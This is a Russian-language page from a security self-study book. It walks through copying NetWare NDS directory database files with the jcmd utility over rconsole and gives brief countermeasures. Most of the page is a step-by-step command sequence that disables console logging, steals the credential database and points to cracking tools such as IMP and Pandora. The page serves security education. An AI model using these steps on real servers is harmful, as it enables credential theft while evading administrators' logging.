Иллюстрированный самоучитель по Secure Web


Получение доступа к файлам NDS - часть 3


jcmd


За последние шесть лет компания JRB Software Limited разработала прекрасные утилиты для системы NetWare, многие из которых можно применять для аудита ее системы безопасности. Однако в отличие от сценариев NetBasic, утилита jcmd не позволяет скопировать открытые файлы NDS. Так что, как и модуль dsmaint.nlm, ее не рекомендуется устанавливать на рабочем сервере. Для обхода этого ограничения необходимо выгрузить службу каталогов. Чтобы скопировать файлы NDS с помощью утилиты jcmd, выполните следующие действия.

1. Подключите сетевой диск, указав путь к каталогу SYS : SYSTEM.

2. Скопируйте на сетевой диск модуль jcmd.nlm.

3. С помощью команды rconsole получите доступ к виртуальной консоли.

4. unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).

5. unload ds.

6. load jcmd

7. cd \_netware (на экране появится информация, представленная на следующем рисунке).


8. dir *.* (для того чтобы с помощью модуля jcmd увидеть имена файлов, нужно использовать символы шаблона)

9. md \login\nds.

10. copy block.nds \login\nds.

11. copy entry.nds \login\nds.

12. copy partitio.nds \login\nds.

13. copy value.nds \Iogin\nds.

14. exit (выход из оболочки).

15. load ds.

16. load conlog.

17. Co стороны клиента воспользуйтесь командой map и подключите сетевой диск, указав путь к каталогу LOGIN\NDS.

18. Скопируйте файлы * .NDS на свой локальный компьютер.

19. Приступайте к взлому.

Контрмеры против "захвата" файлов NDS


Меры защиты против "захвата" данных NDS сводятся к уменьшению количества средств, которые могут быть для этого использованы.

1. Зашифруйте пароль утилиты rconsole, как описывалось выше.

2. Удалите модуль netbasic.nlm из каталога SYS: \SYSTEM и примените к этому каталогу утилиту purge. Как правило, этот модуль оказывается ненужным.

Взлом файлов NDS


Как только взломщики смогли скопировать файлы NDS, можно считать, что они выполнили большую часть поставленной задачи. Сделайте все возможное, чтобы не допустить этого. Как только получены файлы NDS, взломщики, скорее всего, предпримут попытку взломать эти файлы, воспользовавшись специальными средствами. Для этого подойдет любая из свободно распространяемых программ, например IMP, разработанная Шейдом (Shade), или утилиты crypto/crypto2 из пакета Pandora.



Начало  Назад  Вперед